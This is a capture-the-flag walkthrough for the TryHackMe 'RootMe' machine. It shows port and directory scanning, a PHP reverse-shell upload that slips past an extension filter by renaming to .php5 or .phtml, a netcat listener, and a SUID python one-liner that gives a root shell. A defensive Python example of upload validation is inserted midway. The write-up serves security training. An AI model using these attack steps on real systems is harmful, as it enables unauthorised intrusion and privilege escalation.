The room is available at https://tryhackme.com/room/rrootme
Recon
sudo nmap -sS -p- -T4 x.x.x.x -vv
- -sS for Syn/Stealth Scan
- -p- to scan all 65535 ports
- -T4 for aggressive/noisy scan
- -vv for very verbose to monitor the progress of the scan
And we find the following ports open
PORT STATE SERVICE REASON
- 22/tcp open ssh syn-ack ttl 63
- 80/tcp open http syn-ack ttl 63
Now it's time to find out what those ports are running
sudo nmap -sS -sV -p22,80 -T4 10.10.129.163 -vv
- -sS for Syn/Stealth scan
- -sV for Version scan
- -p22,80 for the two open ports we found previously
- -T4 for aggressive/noisy scan
- -vv for very verbose to monitor the progress of the scan
PORT STATE SERVICE REASON VERSION
- 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 tells us there is a web server running, so let's see what it says.

Not much to see, but let's see if there are any hidden directories
dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt
- http points it at the server
- /usr/share/dirb/wordlists/common.txt is a list of common directories to try
And the results are
- ---- Scanning URL: http://x.x.x.x/ ----
- ==> DIRECTORY: http://x.x.x.x/css/
- + http://x.x.x.x/index.php (CODE:200|SIZE:616)
- ==> DIRECTORY: http://x.x.x.x/js/
- ==> DIRECTORY: http://x.x.x.x/panel/
- + http://x.x.x.x/server-status (CODE:403|SIZE:278)
- ==> DIRECTORY: http://x.x.x.x/uploads/
Visiting http://x.x.x.x/panel/ gives us

and visiting http://x.x.x.x/uploads/ gives us

Exploitation
Now let's try to upload a reverse web shell/backdoor to the server and see what happens. A user-friendly and popular webshell is available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell. Just remember to edit the configuration so it points to your Kali machine/VPN machine IP address, and select a port, or you can just leave it at the default 12345.
Uploading the shell.php gives this error message, which means the server is doing some basic checks to try and stop malicious uploads.

But if we change the file extension to something like .php5 or .phtml, it goes through. Then run netcat or ncat in listener mode on your machine with the command
nc -nvlp 4444 (or whatever port you selected).
Then visit http://x.x.x.x/uploads/ and click on your uploaded file, and you should then have a shell connected on your machine via netcat.
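The upload check above rejected .php but accepted .php5 and .phtml, which is the typical failure of a deny-list. The following is an added example, not code from the room or the original write-up: it compares an assumed deny-list filter with an allow-list that also verifies magic bytes. The function names, extension sets and sample uploads are constructed for illustration.

```python
import os

# Assumption: the room's real filter is not shown on the page; this models
# a deny-list that rejects only the literal ".php" extension.
DENYLIST = {".php"}

# Constructed allow-list for an image-upload feature, with the magic bytes
# each type must start with.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def denylist_accepts(filename):
    """Weak check: accept anything whose final extension is not denied."""
    return os.path.splitext(filename)[1] not in DENYLIST

def allowlist_accepts(filename, content):
    """Stricter check: clean name, one allowed extension, matching content."""
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or "\x00" in name:
        return False  # path components or NUL bytes in the supplied name
    stem, ext = os.path.splitext(name.lower())
    # Reject double extensions such as "shell.php.jpg": some Apache handler
    # configurations still map an inner extension to PHP.
    if ext not in MAGIC or "." in stem:
        return False
    return content.startswith(MAGIC[ext])

# Constructed sample uploads: (filename, first bytes of the file).
SAMPLES = [
    ("shell.php", b"<?php"),
    ("shell.php5", b"<?php"),
    ("shell.phtml", b"<?php"),
    ("shell.PHP", b"<?php"),
    ("shell.php.jpg", b"<?php"),
    ("photo.png", b"<?php"),
    ("photo.jpg", b"\xff\xd8\xff\xe0"),
]

def compare(samples=SAMPLES):
    """Return (name, deny-list verdict, allow-list verdict) per sample."""
    return [(n, denylist_accepts(n), allowlist_accepts(n, c)) for n, c in samples]

if __name__ == "__main__":
    for name, weak, strict in compare():
        print(f"{name:15} deny-list={weak!s:5} allow-list={strict}")
```

Name and content checks are only one layer: serving uploads from a directory where PHP execution is disabled removes the impact even if a file slips through.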
After that, let's do a quick search for the user.txt file,
find / -type f -name user.txt 2> /dev/null
Now it's time to elevate our permissions to root to get the final flag, so let's search for files that are owned by root and have the SUID bit set. (This means that the files run with the permissions of the file owner, not your login.)
find / -user root -perm /4000
You will find multiple files with the correct permissions, but we need a shell. And python fits the bill nicely. So change to the directory where the python executable is located.
With a little Google searching, you can find the GTFOBins page at https://gtfobins.github.io/ which is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. A quick scroll down the page and you can find the GTFOBins page for python at https://gtfobins.github.io/gtfobins/python/#suid.
After this, run the command listed on the page.
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
Then run the whoami command to confirm you are root, and then change to the /root/ directory to find the root.txt flag file